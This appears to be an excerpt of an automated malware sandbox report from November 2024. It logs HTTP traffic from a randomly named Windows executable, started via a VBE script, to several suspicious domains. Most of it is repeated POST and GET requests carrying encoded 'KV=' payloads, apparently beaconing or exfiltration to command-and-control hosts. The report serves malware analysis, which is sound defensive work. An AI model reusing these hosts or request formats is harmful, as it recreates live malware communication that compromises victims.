                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2097&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED]
                                                                                                                        Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut
                                                                                                                        Nov 20, 2024 16:57:09.031687021 CET1236INData Raw: 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63
                                                                                                                        Data Ascii: icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" h
                                                                                                                        Nov 20, 2024 16:57:09.031727076 CET725INData Raw: 2c 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 3e 4e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 6d 6f 73 3c 62 72 3e 65 73 73 61 20 70 c3 a1 67 69 6e 61 21 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 61 72 65 63 65 20 71 75 65 20 61 20 70 c3
                                                                                                                        Data Ascii: ,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link vlido.</p> <a hre


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        45192.168.2.1150021208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:14.932281017 CET792OUTPOST /me88/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.614genetics.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.614genetics.online
                                                                                                                        Referer: http://www.614genetics.online/me88/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 36 49 70 4d 4f 37 72 5a 7a 33 38 37 53 4b 63 35 6f 4c 38 6c 48 66 65 4b 38 41 6c 4f 4d 50 55 32 48 37 49 5a 67 30 54 74 69 2b 78 79 64 2b 47 6f 77 6b 7a 39 30 42 6e 63 74 30 79 47 63 39 73 56 74 78 30 64 2f 58 57 70 72 43 54 6e 75 4e 2f 73 2b 47 72 6c 4f 62 59 6b 34 53 53 4b 77 4d 47 73 39 6b 78 34 71 56 46 45 67 45 53 50 75 2b 52 34 4a 61 72 69 59 4c 46 53 37 39 70 54 6f 4a 77 31 69 77 46 31 70 69 36 33 38 79 44 2b 34 34 45 32 32 4a 33 57 75 37 30 50 36 73 6c 35 54 6a 59 34 2b 56 43 47 63 4c 44 79 76 64 67 65 71 54 59 72 48 50 58 4f 4a 73 37 65 4b 5a 56 68 77 68 2b 68 51 3d 3d
                                                                                                                        Data Ascii: KV=n6IpMO7rZz387SKc5oL8lHfeK8AlOMPU2H7IZg0Tti+xyd+Gowkz90Bnct0yGc9sVtx0d/XWprCTnuN/s+GrlObYk4SSKwMGs9kx4qVFEgESPu+R4JariYLFS79pToJw1iwF1pi638yD+44E22J3Wu70P6sl5TjY4+VCGcLDyvdgeqTYrHPXOJs7eKZVhwh+hQ==


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        46192.168.2.1150022208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:17.605170012 CET812OUTPOST /me88/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.614genetics.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.614genetics.online
                                                                                                                        Referer: http://www.614genetics.online/me88/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 36 49 70 4d 4f 37 72 5a 7a 33 38 30 52 53 63 31 72 6a 38 6a 6e 66 52 54 4d 41 6c 41 73 50 51 32 48 2f 49 5a 6a 34 44 74 55 75 78 79 34 53 47 70 31 49 7a 2b 30 42 6e 58 4e 30 33 49 38 39 6e 56 74 38 48 64 2f 37 57 70 72 57 54 6e 72 78 2f 72 4d 75 6f 6b 65 61 2b 2f 6f 53 63 41 51 4d 47 73 39 6b 78 34 71 78 6a 45 67 63 53 54 4f 75 52 34 72 69 6f 72 34 4c 47 62 62 39 70 5a 34 4a 30 31 69 77 33 31 73 36 45 33 35 32 44 2b 36 77 45 31 6e 4a 34 5a 75 37 79 43 61 73 33 35 67 57 64 68 35 55 57 4f 39 33 5a 77 73 35 77 62 73 65 43 37 6b 47 41 4e 61 6b 35 4b 73 34 6c 6f 42 45 33 36 5a 67 67 62 73 2f 4a 35 49 6d 62 49 38 73 44 31 6c 30 77 49 36 51 3d
                                                                                                                        Data Ascii: KV=n6IpMO7rZz380RSc1rj8jnfRTMAlAsPQ2H/IZj4DtUuxy4SGp1Iz+0BnXN03I89nVt8Hd/7WprWTnrx/rMuokea+/oScAQMGs9kx4qxjEgcSTOuR4rior4LGbb9pZ4J01iw31s6E352D+6wE1nJ4Zu7yCas35gWdh5UWO93Zws5wbseC7kGANak5Ks4loBE36Zggbs/J5ImbI8sD1l0wI6Q=


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        47192.168.2.1150023208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:20.268230915 CET1825OUTPOST /me88/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.614genetics.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.614genetics.online
                                                                                                                        Referer: http://www.614genetics.online/me88/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 36 49 70 4d 4f 37 72 5a 7a 33 38 30 52 53 63 31 72 6a 38 6a 6e 66 52 54 4d 41 6c 41 73 50 51 32 48 2f 49 5a 6a 34 44 74 55 6d 78 31 4f 47 47 6f 53 63 7a 2f 30 42 6e 55 4e 30 32 49 38 39 36 56 74 31 76 64 2f 47 6a 70 6f 75 54 6d 4e 6c 2f 71 34 36 6f 74 65 61 2b 67 34 53 52 4b 77 4d 54 73 39 30 31 34 71 68 6a 45 67 63 53 54 49 71 52 73 70 61 6f 74 34 4c 46 53 37 39 74 54 6f 4a 63 31 6d 55 4e 31 73 33 2f 30 4b 2b 44 2f 5a 59 45 35 31 78 34 47 65 37 4b 46 61 74 6b 35 67 4b 57 68 35 67 61 4f 39 7a 67 77 76 70 77 57 61 44 4a 76 48 4b 34 54 4a 51 78 63 64 49 65 74 52 51 45 79 49 4a 55 4e 39 2f 30 76 6f 71 30 50 65 39 76 70 55 77 44 4c 50 61 38 75 33 6c 47 57 68 6f 54 4c 57 31 63 52 6e 4d 6e 74 72 61 33 37 43 71 61 55 75 46 2b 49 43 4f 37 47 32 56 31 67 49 52 4a 37 76 73 78 41 75 77 2f 46 6f 44 4e 50 53 64 36 4e 69 6d 71 76 38 30 75 64 51 6c 64 74 35 31 62 6c 42 48 66 61 6c 44 7a 74 7a 4e 59 33 2b 6c 71 77 4c 39 36 53 43 62 2f 4e 72 7a 62 37 64 77 68 63 45 61 37 44 44 6f 7a 46 35 70 34 67 71 75 [TRUNCATED]
                                                                                                                        Data Ascii: KV=n6IpMO7rZz380RSc1rj8jnfRTMAlAsPQ2H/IZj4DtUmx1OGGoScz/0BnUN02I896Vt1vd/GjpouTmNl/q46otea+g4SRKwMTs9014qhjEgcSTIqRspaot4LFS79tToJc1mUN1s3/0K+D/ZYE51x4Ge7KFatk5gKWh5gaO9zgwvpwWaDJvHK4TJQxcdIetRQEyIJUN9/0voq0Pe9vpUwDLPa8u3lGWhoTLW1cRnMntra37CqaUuF+ICO7G2V1gIRJ7vsxAuw/FoDNPSd6Nimqv80udQldt51blBHfalDztzNY3+lqwL96SCb/Nrzb7dwhcEa7DDozF5p4gqudrTKXbmr7DPC4QZuJz7DsTZRUKNsjEoTmwKMUzT9CWnj9C2TdvZNDGp7CMsaKZNO4iewvjeBtlclHHn1LwxwuEYfCDeAXqFUdDfTNNRl3RcTOGMnqHU2C6Tn5VjznuG1W0HcZ6b3LJ4a5buuWSfGNLUowHf3r+4MPDpimIz7Q8l9GSgfrB6zfzN9W9jg8AYalL63Il0sbh0l6xN/jdbZpCn2abm6Eo/Sgo2NrPWMOtrcFSiVIMV5qdjZSBfxOPQ+sp2bw4FCPEvkEvh2j2EzBGNblb8FJq4R3+e71xqU2CMmjgU6xt9mihJMFCC4C/m1cSq6N723yk8zfiPQStzuImI45XbZt+KOpmFKcIATrvv+wgxB+PC42s4Doo/GHq0/wB2qRUH8DnmFt7x+2/QHenzph3O2rtNX3s2fXN3XGpyDl02Ic13dEZ2WGkKc0qpbgSmP0Uzd3GgiVtG0pjpES64CrcSJeI2ayHDix/uxfQ9j/hatAx1zawfbX9oF94KrUPJGpZb+V5HWSJ0cMEMYSENZA3jLMzopJziTMDcyk2S/KNT2vLk3lKtFsex87GecAm+jaZTYhBwPWpoWnC0tuOCbQKHlKeGywPpdXrocpTk4QqTblT8NQQeucNrDz8ag3hPJrUN4dL49mx0cm7blfdS77AIva58BCH [TRUNCATED]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        48192.168.2.1150024208.91.197.27803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:22.938503027 CET510OUTGET /me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.614genetics.online
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:57:25.490998030 CET1236INHTTP/1.1 200 OK
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:23 GMT
                                                                                                                        Server: Apache
                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                        Set-Cookie: vsid=911vr4796638441327941; expires=Mon, 19-Nov-2029 15:57:24 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BnBJzTNKjI78avGSsc7WV7Z98dNgzOkU+Qp/akw0iafmCHet4UcEIN4lIgkYuhA/Ku+pDvh0dBGXvxsKhcuokg==
                                                                                                                        Content-Length: 2630
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 42 6e 42 4a 7a 54 4e 4b 6a 49 37 38 61 76 47 53 73 63 37 57 56 37 5a 39 38 64 4e 67 7a 4f 6b 55 2b 51 70 2f 61 6b 77 30 69 61 66 6d 43 48 65 74 34 55 63 45 49 4e 34 6c 49 67 6b 59 75 68 41 2f 4b 75 2b 70 44 76 68 30 64 42 47 58
                                                                                                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BnBJzTNKjI78avGSsc7WV7Z98dNgzOkU+Qp/akw0iafmCHet4UcEIN4lIgkYuhA/Ku+pDvh0dBGX
                                                                                                                        Nov 20, 2024 16:57:25.491014957 CET1236INData Raw: 76 78 73 4b 68 63 75 6f 6b 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79
                                                                                                                        Data Ascii: vxsKhcuokg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.614genetics.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.614genetics.online/px.js?ch=2"></scri
                                                                                                                        Nov 20, 2024 16:57:25.491031885 CET1149INData Raw: 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65
                                                                                                                        Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        49192.168.2.1150025185.27.134.144803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:31.444202900 CET771OUTPOST /dcdf/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.amayavp.xyz
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.amayavp.xyz
                                                                                                                        Referer: http://www.amayavp.xyz/dcdf/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 57 47 5a 58 5a 6c 6c 74 44 6a 45 4c 46 37 6f 36 38 38 67 4d 6d 30 6b 4a 79 32 49 74 6e 2b 6e 58 67 56 37 4c 70 73 31 7a 4e 34 4e 64 73 73 30 4e 52 44 6e 52 70 67 4e 74 51 38 63 48 41 67 6e 4e 41 68 4e 32 67 6d 78 42 46 56 50 71 68 33 61 2f 6a 79 4d 48 66 5a 65 67 62 64 4c 56 4b 4b 6f 4f 4f 42 5a 71 68 6f 63 5a 63 39 59 6b 4c 61 62 76 62 49 6f 57 37 4f 41 65 63 41 73 76 6d 5a 65 2b 64 50 50 37 2b 41 59 78 70 6d 39 6d 32 67 34 39 32 4e 70 36 36 4d 7a 78 74 34 4d 46 74 58 42 7a 62 67 56 71 47 42 4c 6c 2f 5a 55 59 5a 65 67 48 74 41 78 4e 4c 65 55 4b 43 72 31 67 74 67 30 4e 42 77 3d 3d
                                                                                                                        Data Ascii: KV=WGZXZlltDjELF7o688gMm0kJy2Itn+nXgV7Lps1zN4Ndss0NRDnRpgNtQ8cHAgnNAhN2gmxBFVPqh3a/jyMHfZegbdLVKKoOOBZqhocZc9YkLabvbIoW7OAecAsvmZe+dPP7+AYxpm9m2g492Np66Mzxt4MFtXBzbgVqGBLl/ZUYZegHtAxNLeUKCr1gtg0NBw==
                                                                                                                        Nov 20, 2024 16:57:32.683039904 CET683INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:32 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Content-Encoding: br
                                                                                                                        Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 0f d3 fa 94 db 52 29 9f eb 35 03 e7 44 9d e8 54 23 1b 7c b3 e4 c4 01 4f b8 3c ea 66 07 3b e8 6d ae d9 b3 3f 41 ea c1 31 b7 46 20 5d 12 98 a6 d3 43 ad 46 00 3f a9 68 cf 30 19 29 58 84 fd 05 46 4d 2b ba 31 53 be 99 4b 59 4e 30 72 16 9e 05 38 05 f2 f3 bb b6 7e c8 44 5e 18 92 a8 43 8d 20 55 06 dc 81 c3 92 b6 34 e1 84 fc 43 dc 87 ff 29 12 4f b0 f5 c8 01 ae 15 2b 3f bf a9 95 89 94 bb 46 d3 ba 7e 7e 2e 85 a2 bf f4 f7 f4 2f 26 73 29 af e7 73 b5 bb d4 e1 2b c1 3c 05 89 31 75 32 ae 5d cb be 6f 7b ed 7c 9f 80 2f bd 84 37 f6 d3 7d 5f e2 18 57 18 13 ff e2 42 02 0d bc 84 2f bb ec 0d 89 fc af b7 a7 24 40 ff 81 1d 67 4c 2b 61 63 a1 92 24 b5 b9 e0 a5 e1 19 2b 84 d5 4c c4 3a c7 84 6a 9b d7 a2 cc f2 dc a4 00 50 72 93 09 91 97 22 66 22 65 25 d3 b9 70 65 3c 40 e6 b1 d6 b1 4a 21 61 50 08 96 26 b9 d3 9c c7 8e 43 9e 97 71 ce 2d 14 23 ae ed c4 6c 1b 3d 01 4c 49 fc fb bb 84 c5 52 62 1f 69 88 60 e7 af ef 3f 42 0b 66 be 9b 2e 3d 43 53 aa a8 26 c4 c7 35 8a cc 0f 65 [TRUNCATED]
                                                                                                                        Data Ascii: 1b9 #MhER)5DT#|O<f;m?A1F ]CF?h0)XFM+1SKYN0r8~D^C U4C)O+?F~~./&s)s+<1u2]o{|/7}_WB/$@gL+ac$+L:jPr"f"e%pe<@J!aP&Cq-#l=LIRbi`?Bf.=CS&5e(K;0AV4Cp>WHznwL0.pC-D)<EfJZJoQZdV^!rP*gV:"0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        50192.168.2.1150026185.27.134.14480
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:35.476897001 CET791OUTPOST /dcdf/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.amayavp.xyz
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.amayavp.xyz
                                                                                                                        Referer: http://www.amayavp.xyz/dcdf/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 57 47 5a 58 5a 6c 6c 74 44 6a 45 4c 58 49 67 36 2f 66 59 4d 33 6b 6b 4b 34 57 49 74 70 65 6e 62 67 56 33 4c 70 75 46 6a 4e 4d 68 64 69 73 45 4e 41 79 6e 52 38 67 4e 74 49 73 63 43 66 77 6e 47 41 68 4a 55 67 6b 31 42 46 57 7a 71 68 32 71 2f 6a 42 55 49 5a 4a 65 75 43 4e 4c 62 45 71 6f 4f 4f 42 5a 71 68 6f 49 2f 63 35 4d 6b 4c 72 72 76 61 70 6f 5a 34 4f 41 64 57 67 73 76 33 4a 65 36 64 50 50 4e 2b 43 73 62 70 6c 56 6d 32 67 49 39 32 5a 31 35 30 38 7a 7a 79 6f 4e 42 6f 79 59 4e 55 54 4d 52 43 41 7a 61 72 39 42 37 63 59 74 64 39 6a 34 61 49 4e 63 49 57 4e 55 51 6b 52 52 45 61 37 35 4c 53 68 74 31 71 70 79 43 75 58 43 76 46 61 43 35 70 52 51 3d
                                                                                                                        Data Ascii: KV=WGZXZlltDjELXIg6/fYM3kkK4WItpenbgV3LpuFjNMhdisENAynR8gNtIscCfwnGAhJUgk1BFWzqh2q/jBUIZJeuCNLbEqoOOBZqhoI/c5MkLrrvapoZ4OAdWgsv3Je6dPPN+CsbplVm2gI92Z1508zzyoNBoyYNUTMRCAzar9B7cYtd9j4aINcIWNUQkRREa75LSht1qpyCuXCvFaC5pRQ=
                                                                                                                        Nov 20, 2024 16:57:36.804306030 CET683INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:36 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Content-Encoding: br
                                                                                                                        Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 0f d3 fa 94 db 52 29 9f eb 35 03 e7 44 9d e8 54 23 1b 7c b3 e4 c4 01 4f b8 3c ea 66 07 3b e8 6d ae d9 b3 3f 41 ea c1 31 b7 46 20 5d 12 98 a6 d3 43 ad 46 00 3f a9 68 cf 30 19 29 58 84 fd 05 46 4d 2b ba 31 53 be 99 4b 59 4e 30 72 16 9e 05 38 05 f2 f3 bb b6 7e c8 44 5e 18 92 a8 43 8d 20 55 06 dc 81 c3 92 b6 34 e1 84 fc 43 dc 87 ff 29 12 4f b0 f5 c8 01 ae 15 2b 3f bf a9 95 89 94 bb 46 d3 ba 7e 7e 2e 85 a2 bf f4 f7 f4 2f 26 73 29 af e7 73 b5 bb d4 e1 2b c1 3c 05 89 31 75 32 ae 5d cb be 6f 7b ed 7c 9f 80 2f bd 84 37 f6 d3 7d 5f e2 18 57 18 13 ff e2 42 02 0d bc 84 2f bb ec 0d 89 fc af b7 a7 24 40 ff 81 1d 67 4c 2b 61 63 a1 92 24 b5 b9 e0 a5 e1 19 2b 84 d5 4c c4 3a c7 84 6a 9b d7 a2 cc f2 dc a4 00 50 72 93 09 91 97 22 66 22 65 25 d3 b9 70 65 3c 40 e6 b1 d6 b1 4a 21 61 50 08 96 26 b9 d3 9c c7 8e 43 9e 97 71 ce 2d 14 23 ae ed c4 6c 1b 3d 01 4c 49 fc fb bb 84 c5 52 62 1f 69 88 60 e7 af ef 3f 42 0b 66 be 9b 2e 3d 43 53 aa a8 26 c4 c7 35 8a cc 0f 65 [TRUNCATED]
                                                                                                                        Data Ascii: 1b9 #MhER)5DT#|O<f;m?A1F ]CF?h0)XFM+1SKYN0r8~D^C U4C)O+?F~~./&s)s+<1u2]o{|/7}_WB/$@gL+ac$+L:jPr"f"e%pe<@J!aP&Cq-#l=LIRbi`?Bf.=CS&5e(K;0AV4Cp>WHznwL0.pC-D)<EfJZJoQZdV^!rP*gV:"0


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:10:53:24
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe"
                                                                                                                        Imagebase:0x7ff7eadf0000
                                                                                                                        File size:170'496 bytes
                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                        Has elevated privileges:false
